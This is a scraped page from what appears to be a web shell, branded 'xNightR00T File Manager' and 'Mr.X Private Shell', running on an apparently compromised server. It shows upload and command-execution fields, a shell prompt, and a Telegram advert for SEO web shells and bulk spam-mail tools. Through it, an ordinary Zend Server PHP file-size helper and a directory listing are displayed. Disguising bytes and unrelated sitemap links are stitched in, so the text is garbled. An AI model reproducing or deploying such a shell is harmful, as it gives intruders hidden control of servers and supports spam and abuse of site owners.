xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

namespace ZendServer\View\Helper;

use Zend\View\Helper\AbstractHelper;
use ZendServer\Exception;

class FileSize extends AbstractHelper
{
    const AUTO      = 'AUTO';
    const B         = 'B';
    const KB        = 'KB';
    const MB        = 'MB';
    const GB        = 'GB';
    const SHOW_UNIT = true;
    const HIDE_UNIT = false;

    protected $sizes = array(self::GB => 30,
        self::MB => 20,
        self::KB => 10,
        self::B => 1);

    /**
     * Get a filesize label.
     *
     * @param integer $size
     * @param string $outputUnit
     * @return string
     * @throws ZendServer\Exception
     */
    public function __invoke($size, $outputUnit = self::AUTO, $showUnit = self::SHOW_UNIT)
    {
        if (!defined("ZendServer\View\Helper\FileSize::$outputUnit")) {
            throw new Exception("Wrong parameter type {$outputUnit}.");
        }
        if (self::AUTO == $outputUnit) {
            $outputUnit = $this->outputSize($size);
        }
        $size = ( $size / ( 1 << $this->sizes[$outputUnit]) );

        // if the number is float, we keep only 2 digits after the decimal point
        if ($size != (int) $size) {
            $size = number_format($size, 2);
        }

        // in the previous if we may have gone in it with 2.0000001 and after it ended with
        // $size = 2.00 so we should trim the 00
        if ($size == (int) $size) {
            $size = (int) $size;
        }

        if ($showUnit) {
            return "$size {$outputUnit}";
        } else {
            return $size;
        }
    }

    /**
     * Calculate the best output size (KB, MB...)
     *
     * @param int $size, size in bytes
     * @return string - Zwas_View_Helper_CE_FileSize constant
     */
    private function outputSize($size)
    {
        foreach ($this->sizes as $type => $mul) {
            if ($size >= (1 << $mul)) {
                return $type;
            }
        }
        // return the smallest (last one itarated) size type
        return $type;
    }
}

Filemanager

Name Type Size Permission Actions
Form Folder 0755
Navigation Folder 0755
DaemonName.php File 740 B 0644
FileSize.php File 1.98 KB 0644
HeadLinkWithVersion.php File 1.74 KB 0644
HeadScriptWithVersion.php File 1.88 KB 0644
OverridePageLabel.php File 734 B 0644
ParseMarkdown.php File 701 B 0644
PhpErrorType.php File 965 B 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml